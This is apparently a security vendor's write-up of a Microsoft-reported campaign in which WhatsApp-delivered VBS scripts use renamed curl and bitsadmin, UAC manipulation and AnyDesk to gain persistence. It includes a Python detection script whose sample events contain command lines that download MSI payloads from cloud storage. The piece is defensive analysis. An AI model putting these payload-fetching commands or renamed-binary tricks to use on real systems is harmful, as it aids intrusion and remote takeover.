Contacts

Bulgaria, Kavarna
Saudi Arabia, Riyadh

+359 875 328030

sales@diamatix.com

WhatsApp as an Entry Point. Microsoft Reports Multi-Stage Windows Malware Using VBS and UAC Bypass

Microsoft has reported an active campaign distributing malicious Visual Basic Script (VBS) files via WhatsApp messages, targeting Windows systems.

The activity has been observed since February 2026 and combines social engineering with system-native tools to establish persistence and remote access.

Campaign Overview

The attack begins with a simple delivery method.

Victims receive VBS files through WhatsApp messages and are tricked into executing them.

Once executed, the script initiates a multi-stage infection chain designed to:

  • establish persistence
  • escalate privileges
  • deploy remote access tools

How the Infection Works

The campaign relies heavily on living-off-the-land techniques.

After execution, the VBS script:

  • creates hidden directories under C:\ProgramData
  • drops renamed legitimate Windows utilities
    • curl.exe disguised as netapi.dll
    • bitsadmin.exe disguised as sc.exe

These tools are then used to retrieve additional payloads from cloud infrastructure.

Observed hosting platforms include:

  • AWS S3
  • Tencent Cloud
  • Backblaze B2

Privilege Escalation and Persistence

Once initial access is established, the malware attempts to escalate privileges.

This is achieved through:

  • repeated attempts to launch elevated processes
  • manipulation of User Account Control (UAC) behavior
  • registry modifications under system-level paths

The infection chain ultimately deploys malicious MSI packages.

In some cases, legitimate tools such as AnyDesk are installed to provide persistent remote access.

Why This Matters

This campaign is not defined by a single technique.

It is defined by how techniques are combined.

Three key observations:

1. Messaging platforms are part of the attack surface
Delivery does not rely on email or traditional phishing.

2. Legitimate tools reduce detection visibility
Renamed binaries and cloud services blend with normal activity.

3. Persistence is built in stages
Initial execution is only the entry point.

DIAMATIX Perspective

This case reflects a common operational pattern.

The attackers do not rely on exploits; they rely on execution and progression.

The initial VBS file is only a trigger.

The real risk emerges from:

  • use of trusted system tools
  • gradual privilege escalation
  • integration with legitimate remote access software

Traditional detection often focuses on known malware signatures.

In this case, much of the activity appears legitimate.

Effective defense requires:

  • visibility into process behavior, not just binaries
  • detection of renamed or repurposed system tools
  • monitoring of unusual outbound connections to cloud storage
  • correlation between user actions and system-level changes
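As an added illustration of those requirements (example code, not from Microsoft's report or from DIAMATIX), the script below runs three detections over constructed process-creation events in the shape of Sysmon Event ID 1 records, which carry the binary's version-info OriginalFileName alongside its on-disk path. The cloud-storage hostnames, the wscript.exe parent and the .cache directory are assumptions chosen for the sample, not indicators from the report.

```python
"""Flag process-creation events matching the renamed-LOLBin pattern."""
import ntpath
from dataclasses import dataclass

# Windows utilities the campaign drops under new names (named in the report).
LOLBIN_ORIGINALS = {"curl.exe", "bitsadmin.exe"}
# Assumed hostname fragments for the storage providers the report names.
CLOUD_STORAGE_HINTS = ("amazonaws.com", "myqcloud.com", "backblazeb2.com")
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}  # hosts that run a .vbs file

@dataclass
class ProcEvent:
    image: str               # full path of the started process
    original_file_name: str  # OriginalFileName from PE version info
    command_line: str
    parent_image: str

def check_event(ev: ProcEvent) -> list[str]:
    """Return the names of every rule the event trips (empty == benign)."""
    hits = []
    on_disk = ntpath.basename(ev.image).lower()
    original = ev.original_file_name.lower()
    parent = ntpath.basename(ev.parent_image).lower()
    cmd = ev.command_line.lower()
    # 1. Version-info name disagrees with the file name: binary was renamed.
    if original and original != on_disk:
        hits.append("renamed_binary")
        if original in LOLBIN_ORIGINALS:
            hits.append("renamed_lolbin")
    # 2. curl/bitsadmin, under any name, pulling from cloud object storage.
    if original in LOLBIN_ORIGINALS and any(h in cmd for h in CLOUD_STORAGE_HINTS):
        hits.append("lolbin_cloud_download")
    # 3. Script host launching an executable that lives under ProgramData.
    if ev.image.lower().startswith("c:\\programdata\\") and parent in SCRIPT_HOSTS:
        hits.append("script_host_spawned_programdata_exe")
    return hits

# Constructed sample events, not real telemetry from the campaign.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\ProgramData\.cache\netapi.dll", "curl.exe",
              r'"C:\ProgramData\.cache\netapi.dll" -o C:\ProgramData\.cache\p.msi https://bkt.s3.amazonaws.com/p.msi',
              r"C:\Windows\System32\wscript.exe"),
    ProcEvent(r"C:\ProgramData\.cache\sc.exe", "bitsadmin.exe",
              r"sc.exe /transfer j /download /priority high https://f000.backblazeb2.com/file/x/r.msi C:\ProgramData\.cache\r.msi",
              r"C:\Windows\System32\wscript.exe"),
    ProcEvent(r"C:\Windows\System32\curl.exe", "curl.exe",
              "curl.exe https://example.org/", r"C:\Windows\System32\cmd.exe"),
]

def triage(events: list[ProcEvent]) -> dict[str, list[str]]:
    """Map each flagged image path to its rule hits; benign events are omitted."""
    return {ev.image: hits for ev in events if (hits := check_event(ev))}

if __name__ == "__main__":
    for image, hits in triage(SAMPLE_EVENTS).items():
        print(image, "->", ", ".join(hits))
```

The third sample, a genuine curl.exe in System32 run from cmd.exe, trips nothing, which is the point: the rules key on the mismatch between what the binary is and where and how it runs, not on the tool itself.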

The entry point may be simple.

The impact depends on how long the activity remains undetected.


Sources

Microsoft Defender Security Research. Analysis of WhatsApp-delivered VBS malware campaign
